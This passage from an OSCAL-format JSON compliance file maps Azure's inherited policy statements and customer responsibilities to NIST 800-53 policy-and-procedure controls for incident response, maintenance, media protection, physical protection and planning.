statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8d822aae-9c1a-486a-824a-872284850546","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-1_smt.c","by-components":[{"uuid":"4e17395b-e1a2-4268-8146-4cede2fa9a7e","export":{"provided":[{"uuid":"70bebf2e-22b0-4949-8a1f-c0f65af38354","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"07fc4596-df26-4271-bbda-99763de5a943","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-004"}],"description":"The customer is responsible for reviewing and updating the current incident response policy on a regular basis and following organization defined events.","provided-uuid":"70bebf2e-22b0-4949-8a1f-c0f65af38354"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b0f1ec0b-3ef4-4be9-9929-b20c73e18bc8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-1","statements":[{"uuid":"e77e8ec9-e790-4f61-8e7a-9d5127f0eaf1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ma-1_smt.a","by-components":[{"uuid":"db68b3c0-e5bb-4332-a6b4-c84b9a32dd36","export":{"provided":[{"uuid":"7d62e27a-8401-441e-bcc7-1e58a2dd6bcb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-001"}],"description":"Azure addresses the system maintenance policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Maintenance, utilities, and tools * Data integrity Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with system maintenance are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Physical and Environmental Security Standard implements the system maintenance policy and associated controls and documents the following procedures: * Maintenance activities * Authorized personnel * Maintenance tickets Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with system maintenance are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"f9f3b927-5b6c-45d2-bc21-6e019264c4c0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-001"}],"description":"The customer is responsible for developing, documenting, and disseminating maintenance policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the maintenance policy and the associated maintenance controls.","provided-uuid":"7d62e27a-8401-441e-bcc7-1e58a2dd6bcb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"30c28a98-a1f1-4b18-9a4b-9c681e3ad4b3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ma-1_smt.b","by-components":[{"uuid":"3b991d23-6296-4c5e-be39-bf26c4cc35bf","export":{"provided":[{"uuid":"341812c6-5cc7-46d8-9335-0639013a41e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"a0515d0f-82c6-4024-ad9a-f44cfddb9fb2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the maintenance policy and procedures.","provided-uuid":"341812c6-5cc7-46d8-9335-0639013a41e9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b0bd92b9-73a4-4ae9-bd21-7b45bb7f0b7e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ma-1_smt.c","by-components":[{"uuid":"5a709dc8-a080-44f6-9827-c71871ffc2dc","export":{"provided":[{"uuid":"8e7170e3-69d1-4e9e-afaa-dbad1678bdee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"bfc38c8a-9ad7-46b6-8eff-9d144e3c7443","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-004"}],"description":"The customer is responsible for reviewing and updating the current maintenance policy on a regular basis and following organization defined events.","provided-uuid":"8e7170e3-69d1-4e9e-afaa-dbad1678bdee"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"9c8fb35a-bbca-43e9-9845-872cd87c7569","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-1","statements":[{"uuid":"63900af2-5503-4aa3-9f9f-1d266eb6b351","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"mp-1_smt.a","by-components":[{"uuid":"98de1ff4-fa2c-41bd-8a5a-65caa38d623c","export":{"provided":[{"uuid":"2efb80b7-7dd0-42c1-999c-91a1b0c8ef69","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-001"}],"description":"Azure addresses the media protection policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * How important organizational records relating to the organization's Information Security Program, independent of media type, must be retained, stored, protected, and, if appropriate, destroyed according to the established information handling procedures for the records Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with media protection are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Microsoft Asset Classification Standard and Asset Protection Standard implements the media protection policy and associated controls and documents the following procedures: * Handling and protection of assets * Asset classification Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with media protection are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"148ab672-f510-4c87-b082-c3da30c723c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-001"}],"description":"The customer is responsible for developing, documenting, and disseminating media protection policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. Due to there not being any customer-controlled media within the scope of systems deployed on Azure, all media protection controls will be implemented and managed by Azure. However, the customer is still responsible for the appropriate policy and procedure documents. \nThe customer is responsible for procedures to facilitate the implementation of the media protection policy and the associated media protection controls.","provided-uuid":"2efb80b7-7dd0-42c1-999c-91a1b0c8ef69"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"475dc7cf-a2e6-4867-969e-b1f79a828ad6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"mp-1_smt.b","by-components":[{"uuid":"d7048308-955f-4822-8918-2315f2190910","export":{"provided":[{"uuid":"7c18e34c-ab20-45af-815a-2563fe691fa9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"13919fa8-1b06-48ff-862c-75d2f41f867b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of media protection policy and procedures.","provided-uuid":"7c18e34c-ab20-45af-815a-2563fe691fa9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"9b45ed2b-37e8-44db-86f6-c3d08b38ff96","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"mp-1_smt.c","by-components":[{"uuid":"eba82c34-64e8-4bb1-b249-ba5db414c5f6","export":{"provided":[{"uuid":"551e95f1-34fe-450c-83e3-6f588f2cfe47","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"00ea061a-904c-4a9f-b432-af3814d83c8b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-004"}],"description":"The customer is responsible for reviewing and updating the current media protection policy on a regular basis and following organization defined events.","provided-uuid":"551e95f1-34fe-450c-83e3-6f588f2cfe47"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"386c1199-fd0a-413a-8dcb-54e5daaff43a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-1","statements":[{"uuid":"d9ad0e25-e2b9-4c1d-b3e6-06cc703073b6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"pe-1_smt.a","by-components":[{"uuid":"68bdabd4-7678-43cb-8871-1c1c81d7d1ba","export":{"provided":[{"uuid":"05fed34e-fc0d-47f3-a985-8449feb8e821","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-001"}],"description":"Azure addresses the physical and environmental protection policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Prevention of unauthorized access, damage, or interference to Microsoft facilities Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with physical and environmental protection are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Physical and Environmental Security Standard implements the physical and environmental protection policy and associated controls and documents the following procedures: * Physical access control * Cyber Defense Operations (CDOC) operations * Audit and compliance * Technology, applications, and equipment employed at the datacenters Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with physical and environmental protection are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"f5202c5c-7c8a-4a24-83d6-8223ad26f996","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-001"}],"description":"The customer is responsible for developing, documenting, and disseminating physical and environmental protection policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. Due to customers not having physical access to any resources in Azure datacenters, all physical and environmental protection controls will be implemented and managed by Azure. However, the customer is still responsible for the appropriate policy and procedure documents. \nThe customer is responsible for procedures to facilitate the implementation of the physical and environmental protection policy and the associated physical and environmental protection controls.","provided-uuid":"05fed34e-fc0d-47f3-a985-8449feb8e821"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a413287b-6ded-4109-b968-03d1c2a5fe6f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"pe-1_smt.b","by-components":[{"uuid":"98493dce-db2f-4023-955b-57229f159842","export":{"provided":[{"uuid":"973859d6-9b02-496d-bd90-a4e72905631d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"407f9359-e2c9-46c5-ba4e-3dc11c30c422","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of physical and environmental protection policy and procedures.","provided-uuid":"973859d6-9b02-496d-bd90-a4e72905631d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b71e72c5-32a0-4b4d-9d88-cc83130aebf5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"pe-1_smt.c","by-components":[{"uuid":"17937dd0-9caf-41d8-bf0a-b2dab2d21d70","export":{"provided":[{"uuid":"f4f48fef-11d7-40b7-8bdd-80888d9f63ab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"0f9e8402-d780-4fb0-a4ea-196cd2715e91","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-004"}],"description":"The customer is responsible for reviewing and updating the current physical and environmental protection policy on a regular basis and following organization defined events.","provided-uuid":"f4f48fef-11d7-40b7-8bdd-80888d9f63ab"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c3ccce3e-c7e7-41d9-86f4-8677236d35f5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-1","statements":[{"uuid":"1338d976-3825-4f75-a632-d05378bcd0cc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"pl-1_smt.a","by-components":[{"uuid":"3d30ff00-be9a-4ada-ad57-6dba7866efe0","export":{"provided":[{"uuid":"f4b4b468-58fa-412b-8f24-f14e87887ec7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-001"}],"description":"Azure addresses the planning policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. The MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Security policy * Security roles and responsibilities Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The standards indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with planning are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Security Assessment and Authorization Standard Operating Procedure (SOP) implements the planning policy and associated controls and documents the following procedures: * Documentation * Plans of action and milestones Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with planning are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"79345cdf-3713-48eb-9cb3-70ab6e71c77b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-001"}],"description":"The customer is responsible for developing, documenting, and disseminating planning protection policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the planning policy and the associated planning controls.","provided-uuid":"f4b4b468-58fa-412b-8f24-f14e87887ec7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a0e345d2-6b3b-41ee-a558-443e9b2c3987","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"pl-1_smt.b","by-components":[{"uuid":"b830f28c-cf67-48e3-924a-51d3ea34cb4a","export":{"provided":[{"uuid":"cd08b31b-cb57-4cac-9ee0-e755a2d61c7d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"23737d2d-0508-4993-b840-18fff4ad37ac","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the planning policy and procedures.","provided-uuid":"cd08b31b-cb57-4cac-9ee0-e755a2d61c7d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a1f3372b-baa0-4c37-a581-0ba45cc0a6ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"pl-1_smt.c","by-components":[{"uuid":"4dce76ed-730f-4dcc-89e2-2218d03dab13","export":{"provided":[{"uuid":"ee23477d-d84d-43ce-be37-64777009eb35","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"bb858e1f-ec4e-40c6-8e87-1e7070aa9ae2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-004"}],"description":"The customer is responsible for reviewing and updating the current planning policy on a regular basis and following organization defined events.","provided-uuid":"ee23477d-d84d-43ce-be37-64777009eb35"}]},"description":"See inheritance and customer responsibility 